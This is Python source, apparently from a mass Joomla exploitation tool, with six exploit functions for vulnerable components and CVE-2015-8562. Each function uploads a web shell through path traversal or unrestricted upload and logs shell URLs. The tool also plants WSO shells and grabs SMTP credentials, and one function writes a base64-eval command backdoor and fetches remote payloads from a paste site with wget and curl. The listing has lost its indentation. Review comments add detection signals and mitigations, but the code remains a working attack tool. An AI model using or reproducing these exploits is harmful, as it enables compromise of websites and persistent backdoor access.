# Exploit(site): file-upload check against the Joomla component com_simplephotogallery
# (administrator/components/com_simplephotogallery/lib/uploadFile.php).
#
# Flow as written: POSTs `payloadshell` as 'vuln.php.xxxjpg' together with a `jpath` field
# holding URL-encoded '../' sequences ending in tmp/, then GETs /tmp/vuln.php.xxxjpg and
# looks for the marker 'Vuln!!'. On a match it appends the URL to result/Shell_results.txt,
# calls getSMTP.JooomlaSMTPshell and wsoShellUploaderModule.UploadWso, appends any UploadWso
# result other than 'No' to result/WSo_Shell.txt, and returns printModule.returnYes(...).
# Every other path returns printModule.returnNo(...).
#
# NOTE(review): `payloadshell`, `Headers`, `getSMTP`, `wsoShellUploaderModule` and
# `printModule` are defined outside this block; what the helpers do is not visible here.
# NOTE(review): the bare `except:` reports every failure (DNS, TLS, timeout, even
# KeyboardInterrupt) as "not vulnerable", so a negative result is not evidence of a patched host.
#
# Defender view: the handler accepts a client-chosen directory (`jpath`) and a multi-extension
# file name. Signals visible in this code: POSTs to .../com_simplephotogallery/lib/uploadFile.php
# whose `jpath` contains '..' (raw or %2F-encoded), new files with '.php.' in their name under
# the site's tmp/ directory, and later GETs to them carrying a `cmd` parameter.
# Mitigations: remove or update the component, resolve and confine the target directory
# server-side, map the PHP handler only to a final '.php' extension, and disable script
# execution in writable directories.
def Exploit(site): try: PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'} fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')} requests.post( 'http://' + site + '/administrator/components/com_simplephotogallery/lib/uploadFile.php', data=PostData, files=fil, timeout=10, headers=Headers) Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg', timeout=10, headers=Headers) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/tmp/vuln.php.xxxjpg?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery', 'Joomla')
# Exploit(site): file-upload check against the Joomla component com_redmystic, through the
# upload script shipped in its chart/ofc-library directory (ofc_upload_image.php).
#
# Flow as written: POSTs `payloadshell` as the raw request body with `name=vuln.php` in the
# query string, then GETs chart/tmp-upload-images/vuln.php and looks for the marker 'Vuln!!'.
# On a match it appends the URL to result/Shell_results.txt, calls getSMTP.JooomlaSMTPshell
# and wsoShellUploaderModule.UploadWso, appends any UploadWso result other than 'No' to
# result/WSo_Shell.txt, and returns printModule.returnYes(...); otherwise returnNo(...).
#
# NOTE(review): `payloadshell`, `Headers` and the three helper modules are defined outside
# this block; their behaviour is not visible here.
# NOTE(review): the bare `except:` turns every error into a "No" result, so a negative result
# does not show the host is patched.
#
# Defender view: the script writes the request body to a client-chosen file name inside a
# web-reachable directory. Signals visible in this code: POSTs to .../ofc_upload_image.php with
# a `name` ending in a script extension, and script files under chart/tmp-upload-images/.
# Mitigations: delete the upload script if the charts do not need it, remove or update the
# component, and deny script execution in tmp-upload-images/.
def Exploit(site): try: requests.post('http://' + site + '/administrator/components/com_redmystic/chart/' 'ofc-library/ofc_upload_image.php?name=vuln.php', data=payloadshell, headers=Headers, timeout=10) Exp = requests.get('http://' + site + '/administrator/components/com_redmystic/' 'chart/tmp-upload-images/vuln.php', headers=Headers, timeout=10) if 'Vuln!!' in str(Exp.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/administrator/components/com_redmystic/chart/' 'tmp-upload-images/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/administrator/components/com_redmystic/chart/' 'tmp-upload-images/vuln.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso(site + '/administrator/components/com_redmystic/chart/' 'tmp-upload-images/vuln.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_redmystic', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_redmystic', 'Joomla')
# Exploit(site): file-upload check against the Joomla component com_b2jcontact (its
# `view=loader&type=uploader` endpoint).
#
# Flow as written: POSTs `payloadshell` as the raw body with a `qqfile` value that starts with
# '/../' sequences, then GETs /components/com_b2jcontact/vuln.php and looks for the marker
# 'Vuln!!'. On a match it appends the URL to result/Shell_results.txt, calls
# getSMTP.JooomlaSMTPshell and wsoShellUploaderModule.UploadWso, appends any UploadWso result
# other than 'No' to result/WSo_Shell.txt, and returns printModule.returnYes(...); otherwise
# returnNo(...).
#
# NOTE(review): `payloadshell`, `Headers` and the helper modules are defined outside this block.
# NOTE(review): the bare `except:` turns every error into a "No" result.
#
# Defender view: the uploader uses the client-supplied `qqfile` as a path rather than as a
# bare file name. Signals visible in this code: requests with option=com_b2jcontact and a
# `qqfile` containing '..', and unexpected .php files directly under components/com_b2jcontact/.
# Mitigations: remove or update the component, reduce upload names to their basename,
# enforce an extension allowlist, and store uploads outside the web root.
def Exploit(site): try: requests.post( 'http://' + site + '/index.php?option=com_b2jcontact&view=loader&type=uploader&' 'owner=component&bid=1&qqfile=/../../../vuln.php', data=payloadshell, timeout=10, headers=Headers) CheckSh = requests.get('http://' + site + '/components/com_b2jcontact/vuln.php', timeout=10, headers=Headers) if 'Vuln!!' in str(CheckSh.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/components/com_b2jcontact/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/components/com_b2jcontact/vuln.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/components/com_b2jcontact/vuln.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_b2jcontact', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_b2jcontact', 'Joomla')
# Exploit(site): file-write check against the Joomla component com_oziogallery
# (imagin/scripts_ralcr/filesystem/writeToFile.php).
#
# Flow as written: POSTs a multipart `raw_data` part containing `payloadshell` together with a
# `path` field of '../../../tmp/', then GETs a path under /tmp/ and looks for the marker
# 'Vuln!!'. On a match it appends a /tmp/ URL to result/Shell_results.txt, calls
# getSMTP.JooomlaSMTPshell and wsoShellUploaderModule.UploadWso, appends any UploadWso result
# other than 'No' to result/WSo_Shell.txt, and returns printModule.returnYes(...); otherwise
# returnNo(...).
#
# NOTE(review): `payloadshell`, `Headers` and the helper modules are defined outside this block.
# NOTE(review): the bare `except:` turns every error into a "No" result.
#
# Defender view: an unauthenticated script writes posted data to a client-chosen directory.
# Signals visible in this code: POSTs to .../filesystem/writeToFile.php with '..' in `path`,
# and script files appearing in the site's tmp/ directory.
# Mitigations: remove or update the component, block direct web access to the scripts_ralcr
# helpers, and deny script execution in tmp/.
def Exploit(site): try: PostData = {'path': '../../../tmp/'} fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')} requests.post( 'http://' + site + '/components/com_oziogallery/imagin/scripts_ralcr/filesystem' '/writeToFile.php', files=fil, data=PostData, headers=Headers, timeout=10) CheckShell = requests.get('http://' + site + '/tmp/up.php', headers=Headers, timeout=10) if 'Vuln!!' in str(CheckShell.content): with open('result/Shell_results.txt', 'a') as writer: writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso(site + '/tmp/vuln.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) return printModule.returnYes(site, 'N/A', 'Com_oziogallery', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
# exploit(url): module labelled 'Joomla 3.x Rce' / CVE-2015-8562 in its own result strings.
#
# Flow as written: calls make_req() on url + '/index.php/component/users' with the value of
# get_backdoor_pay(), then checks ping_backdoor(url, backdoor_param). It issues several
# execute_backdoor() calls whose PHP strings run system() to create vuln.htm, vuln.php and
# c.php and to download content from a paste-site URL into images/ with
# file_get_contents, wget and curl. It then GETs a fixed list of paths, looks for the markers
# 'Shell Access!' and 'Vuln!!', appends matching URLs to result/Shell_results.txt,
# result/WSo_Shell.txt and result/Index_results.txt, and returns printModule.returnYes(...) or
# printModule.returnNo(...).
#
# NOTE(review): make_req, get_backdoor_pay, ping_backdoor, execute_backdoor, backdoor_param,
# Headers and the helper modules are defined outside this block; how the initial payload is
# delivered is not visible here.
# NOTE(review): the listing has lost its indentation, so which statements sit inside the
# `if ping_backdoor(...)` branch cannot be determined from this text.
# NOTE(review): the bare `except:` turns every error into a "No" result.
#
# Defender view: signals visible in this code are newly created vuln.htm, vuln.php and c.php
# in the web root, new .php files under images/, and outbound wget/curl/file_get_contents
# requests from the web server to a paste site.
# Mitigations: apply the vendor fix for CVE-2015-8562, restrict outbound connections from web
# servers, deny script execution in images/, and monitor the web root for new script files.
def exploit(url): try: target_url = url + '/index.php/component/users' make_req(target_url, get_backdoor_pay()) if ping_backdoor(url, backdoor_param): execute_backdoor( url, 'system(\'echo "Vuln!!" > vuln.htm\');') # cmd=commend execute_backdoor( url, 'system(\'echo "Shell Access!<?php {}(base64_decode("{}")); ?>" > vuln.php\');' .format('eval', 'c3lzdGVtKCRfR0VUWyJjbWQiXSk7')) execute_backdoor( url, 'system(\'echo "<?php fwrite(fopen("images/sh3.php","w+"),file_get_contents("https://hastebin.com/raw/oqikagison")); ?>" > c.php\');' ) execute_backdoor( url, 'system(\'wget https://hastebin.com/raw/oqikagison -O images/sh.php\');' ) execute_backdoor( url, 'system(\'curl -O https://hastebin.com/raw/oqikagison;mv oqikagison images/sh2.php\');' ) CheckShell = requests.get('http://' + url + '/vuln.php', headers=Headers, timeout=10) checkIndex = requests.get('http://' + url + '/vuln.htm', headers=Headers, timeout=10) requests.get('http://' + url + '/cc.php', headers=Headers, timeout=10) CheckShell2 = requests.get('http://' + url + '/images/up3.php', headers=Headers, timeout=10) CheckShell3 = requests.get('http://' + url + '/images/up2.php', headers=Headers, timeout=10) CheckShell4 = requests.get('http://' + url + '/images/up.php', headers=Headers, timeout=10) if 'Shell Access!' in str(CheckShell.content): WSo = wsoShellUploaderModule.UploadWso(url + '/vuln.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/vuln.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/vuln.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) elif 'Shell Access!' 
in str(CheckShell2.content): WSo = wsoShellUploaderModule.UploadWso( url + '/images/up3.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/images/up3.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/images/up3.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) elif 'Shell Access!' in str(CheckShell3.content): WSo = wsoShellUploaderModule.UploadWso( url + '/images/up2.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/images/up2.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/images/up2.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) elif 'Shell Access!' in str(CheckShell4.content): WSo = wsoShellUploaderModule.UploadWso(url + '/images/up.php?cmd=id') getSMTP.JooomlaSMTPshell(url + '/images/up.php?cmd=id') with open('result/Shell_results.txt', 'a') as writer: writer.write(url + '/images/up.php?cmd=id' + '\n') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) if 'Vuln!!' in str(checkIndex.content): with open('result/Index_results.txt', 'a') as writer: writer.write(url + '/vuln.htm\n') return printModule.returnYes(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') else: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla') except: return printModule.returnNo(url, 'CVE-2015-8562', 'Joomla 3.x Rce', 'Joomla')
# Exploit(site): file-upload check against the Joomla component com_foxcontact.
#
# Flow as written: GETs components/com_foxcontact/foxcontact.php and continues only if the
# body contains 'Restricted access'. It then GETs index.php?option=com_foxcontact&view=invalid
# and extracts Itemid values from that page with a regex. For each id it builds four
# uploader URLs whose `qqfile` value contains '/../../', POSTs `payloadshell` to them, GETs
# /components/com_foxcontact/neko.php and looks for the marker 'neko!!'. On a match it appends
# the URL to result/Shell_results.txt, calls getSMTP.JooomlaSMTPshell and
# wsoShellUploaderModule.UploadWso, appends any UploadWso result other than 'No' to
# result/WSo_Shell.txt and sets `flag`. It returns printModule.returnYes(...) when `flag` is
# set and printModule.returnNo(...) otherwise.
#
# NOTE(review): `payloadshell`, `Headers`, `re` and the helper modules come from outside this
# block. The listing has lost its indentation, so the exact loop nesting of the check and the
# `break` cannot be determined from this text.
# NOTE(review): the bare `except:` turns every error into a "No" result.
#
# Defender view: the uploader endpoints use the client-supplied `qqfile` as a path. Signals
# visible in this code: a GET with view=invalid followed by a burst of POSTs to
# file-uploader.php, uploader.php or view=loader&type=uploader with '..' in `qqfile`, and new
# .php files directly under components/com_foxcontact/.
# Mitigations: remove or update the component, reduce upload names to their basename,
# enforce an extension allowlist, and store attachments outside the web root.
def Exploit(site): try: Checker = requests.get('http://' + site + "/components/com_foxcontact/foxcontact.php", timeout=10, headers=Headers) if 'Restricted access' in str(Checker.content): GotCid = requests.get( 'http://' + site + '/index.php?option=com_foxcontact&view=invalid', timeout=10, headers=Headers) cids = re.findall('foxcontact&Itemid=(.*?)" >', str(GotCid.content)) flag = 0 for cid in cids: cid = str(cid) URLS = [ "/components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../{}" .format(cid, cid, 'neko.php'), "/index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}" "?cid={}&mid={}&qqfile=/../../{}".format( cid, cid, cid, 'neko.php'), "/index.php?option=com_foxcontact&view=loader&type=uploader&" "owner=module&id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../{}" .format(cid, cid, cid, cid, 'neko.php'), "/components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../{}" .format(cid, cid, 'neko.php') ] for path in URLS: Exp = site + path requests.post('http://' + Exp, data=payloadshell, timeout=10, headers=Headers) SH = requests.get('http://' + site + '/components/com_foxcontact/neko.php', timeout=10, headers=Headers) if 'neko!!' in str(SH.content): with open('result/Shell_results.txt', 'a') as writer: writer.write( site + '/components/com_foxcontact/neko.php?cmd=uname -a' + '\n') getSMTP.JooomlaSMTPshell( site + '/components/com_foxcontact/neko.php?cmd=id') WSo = wsoShellUploaderModule.UploadWso( site + '/components/com_foxcontact/neko.php?cmd=id') if WSo == 'No': pass else: with open('result/WSo_Shell.txt', 'a') as Wr: Wr.write('{}\n'.format(WSo)) flag = 1 break else: pass if flag == 0: return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla') else: return printModule.returnYes(site, 'N/A', 'Com_FoxContact', 'Joomla') else: return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla') except: return printModule.returnNo(site, 'N/A', 'Com_FoxContact', 'Joomla')